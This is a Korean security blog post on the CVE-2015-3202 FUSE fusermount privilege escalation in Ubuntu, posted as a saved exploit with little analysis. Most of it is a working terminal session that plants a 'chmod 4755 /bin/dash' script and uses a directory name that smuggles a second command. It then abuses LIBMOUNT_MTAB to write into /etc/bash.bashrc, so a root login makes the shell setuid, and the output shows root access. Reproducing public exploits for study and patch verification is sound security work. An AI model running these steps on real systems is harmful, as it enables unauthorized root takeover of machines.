Hello, Stranger

FUSE privilege escalation(CVE-2015-3202) 본문

Security/취약점 분석

FUSE privilege escalation(CVE-2015-3202)

blackcon 2015.06.03 23:02

/*  FUSE Exploit Closed in all ubuntu OS                                           */

/*  아직 제대로 된 분석은 못하였고 코드만 임시저장 :D                           */

/*  여유로운시간이 다시 온다면 상세 분석보고서를 작성해서 올릴게요!! */

/*  https://gist.github.com/taviso/ecb70eb12d461dd85cba      */


<취약한버전>


<TEST>

 1. 일반 유저권한에서 아래와 같은순서 로 명령어를 입력.

 2. 일반유저에서 'LIBMOUNT_MTAB'까지 입력을  한 후 root 가서버에 접속.

 3. 일반유저는 root로 권한상승


[User]
blackcon@bk:~$ 
blackcon@bk:~$ id
uid=1000(blackcon) gid=1000(blackcon) 그룹들=1000(blackcon),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),123(sambashare)
blackcon@bk:~$ sh -c 'id' 
uid=1000(blackcon) gid=1000(blackcon) 그룹들=1000(blackcon),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),123(sambashare)
blackcon@bk:~$ printf "chmod 4755 /bin/dash" > /tmp/exploit && chmod 7555 /tmp/exploit
blackcon@bk:~$ ls -la /tmp
합계 44
drwxrwxrwt  9 root     root     4096  5월 22 16:05 .
drwxr-xr-x 24 root     root     4096  5월 14 21:28 ..
drwxrwxrwt  2 root     root     4096  5월 22 08:56 .ICE-unix
-r--r--r--  1 root     root       11  5월 22 08:56 .X0-lock
drwxrwxrwt  2 root     root     4096  5월 22 16:04 .X11-unix
drwxrwxrwt  2 root     root     4096  5월 22 15:59 VMwareDnD
-rw-------  1 blackcon blackcon    0  5월 22 08:56 config-err-8RAdOZ
-r-sr-sr-t  1 blackcon blackcon   20  5월 22 16:05 exploit
drwx------  2 root     root     4096  5월 22 08:56 pulse-PKdhtXMmr18n
drwx------  2 blackcon blackcon 4096  5월 22 08:56 ssh-dffCiUhLpXS1
drwx------  2 blackcon blackcon 4096  5월 22 15:59 vmware-blackcon
drwx------  2 root     root     4096  5월 22 08:56 vmware-root
blackcon@bk:~$ mkdir -p '/tmp/exploit||/tmp/exploit'
blackcon@bk:~$ ls -ls /tmp
합계 28
4 drwxrwxrwt 2 root     root     4096  5월 22 15:59 VMwareDnD
0 -rw------- 1 blackcon blackcon    0  5월 22 08:56 config-err-8RAdOZ
4 -r-sr-sr-t 1 blackcon blackcon   20  5월 22 16:05 exploit
4 drwxrwxr-x 3 blackcon blackcon 4096  5월 22 16:06 exploit||
4 drwx------ 2 root     root     4096  5월 22 08:56 pulse-PKdhtXMmr18n
4 drwx------ 2 blackcon blackcon 4096  5월 22 08:56 ssh-dffCiUhLpXS1
4 drwx------ 2 blackcon blackcon 4096  5월 22 15:59 vmware-blackcon
4 drwx------ 2 root     root     4096  5월 22 08:56 vmware-root
blackcon@bk:~$ LIBMOUNT_MTAB=/etc/bash.bashrc _FUSE_COMMFD=0 fusermount '/tmp/exploit||/tmp/exploit'
fusermount: failed to open /etc/fuse.conf: Permission denied
sending file descriptor: Socket operation on non-socket
blackcon@bk:~$ cat /etc/bash.bashrc
/dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=blackcon 0 0
blackcon@bk:~$ sh -c 'id'
uid=1000(blackcon) gid=1000(blackcon) euid=0(root) 그룹들=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),123(sambashare),1000(blackcon)
blackcon@bk:~$ sh -c 'sh'
# id
uid=1000(blackcon) gid=1000(blackcon) euid=0(root) 그룹들=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),123(sambashare),1000(blackcon)
========================================
[root]    <- just login
blackcon@bk:~$ sudo su
[sudo] password for blackcon: 
bash: /dev/fuse: 허가 거부
           _     _    _                               
          | |   | |  ( )                              
          | |__ | |  |/ ___    _____ ___  ____  _____ 
          |  _ \| |_/ )/___)  (___  / _ \|  _ \| ___ |
          | |_) |  _ (|___ |   / __| |_| | | | | ____|
          |____/|_| \_(___/   (_____\___/|_| |_|_____)  @blackcon

          root@jihwan:/home/jh304# id
          uid=0(root) gid=0(root) groups=0(root)
root@bk:/home/blackcon# 





저작자 표시
신고
0 Comments
댓글쓰기 폼